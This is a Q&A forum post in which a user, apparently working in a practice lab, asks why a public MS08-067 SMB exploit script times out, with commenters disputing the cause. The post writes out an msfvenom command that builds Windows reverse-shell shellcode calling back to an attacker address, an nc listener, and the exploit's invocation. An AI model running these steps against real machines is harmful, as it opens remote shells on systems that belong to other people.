1

I am somewhat new to this and trying to figure out why my program isn't executing as expected. I ran it a number of times with 1 time being completed successfully but not allowing me to connect to the victims machine.

I am running the following exploit on my victims machine (https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py)

I used the following msf to create my shell code

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

I then dropped that shell code into the script to replace the older one.

If you read below in the script you can see the following. Basically you can alter which windows execution is used from 1-7.

def __DCEPacket(self):
    if (self.os == '1'):
        print 'Windows XP SP0/SP1 Universal\n'
        ret = "\x61\x13\x00\x01"

I ran from 1-7 for the most part and every time I got the same issue:

Windows XP SP0/SP1 Universal
 [-]Initiating connection
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "ms08-067.py", line 217, in run
    self.__DCEPacket()
  File "ms08-067.py", line 192, in __DCEPacket
    self.__trans.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 386, in connect
    self.setup_smb_connection()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 381, in setup_smb_connection
    preferredDialect=self.__prefDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 74, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 111, in negotiateSession
    self._timeout, True, flags1=flags1, flags2=flags2, data=negoData)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 159, in negotiateSessionWildcard
    timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 878, in __init__
    timeout=timeout, local_type=local_type, sock=sock)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 738, in __init__
    self._sock = self._setup_connection((remote_host, sess_port), timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 889, in _setup_connection
    raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
error: [Errno Connection error (10.10.10.4:445)] timed out

I have my script running as the following

nc -lnvp 443

And

python ms08-067.py <IP address> <version number> <445>
schroeder
  • 129,372
  • 55
  • 299
  • 340
newbieflow
  • 11
  • 2
  • This isn't a security problem. This is a typo problem. Read the last line of the error carefully. – schroeder Nov 15 '19 at 19:39
  • Connection error (10.10.10.4:445) but you are listening on nc -lnvp 443 – schroeder Nov 15 '19 at 19:40
  • @schroeder you are wrong, 445 is correct port for SMB – Dauren Akilbekov May 20 '20 at 09:52
  • @DaurenAkilbekov I am not wrong. I'm quoting the OP's error and the command the OP used. – schroeder May 20 '20 at 09:56
  • This error is not because of the OPs mistake, but problem with the code he is using. Here is explanation https://forum.hackthebox.eu/discussion/592/manual-ms08-067-issue. – Dauren Akilbekov May 20 '20 at 10:07
  • @DaurenAkilbekov you are going to have to summarise the link. That's a long thread without much context. – schroeder May 20 '20 at 10:20
  • You are saying he made a typo, but he didn't. He is trying to open reverse shell and listening on port 443 to catch it, while using vulnerability in SMB on port 445. Error here is happening because of python code. – Dauren Akilbekov May 20 '20 at 10:25
  • @DaurenAkilbekov if nc was run on the attacking machine, that makes sense. But if so, the nc command is irrelevant to the question or the troubleshooting scenario. If we remove that whole section, along with the msfvenon line (which would also be irrelevant) then the question comes down to debugging some random exploit script, which is also off-topic here. – schroeder May 20 '20 at 10:26
  • @DaurenAkilbekov and if all that was true, I'm now very concerned that the OP copy/pasted IP info from the example into the OP's live environment without regard for the IPs in the OP's environment. Which would make this a typo issue again. – schroeder May 20 '20 at 10:32

0 Answers0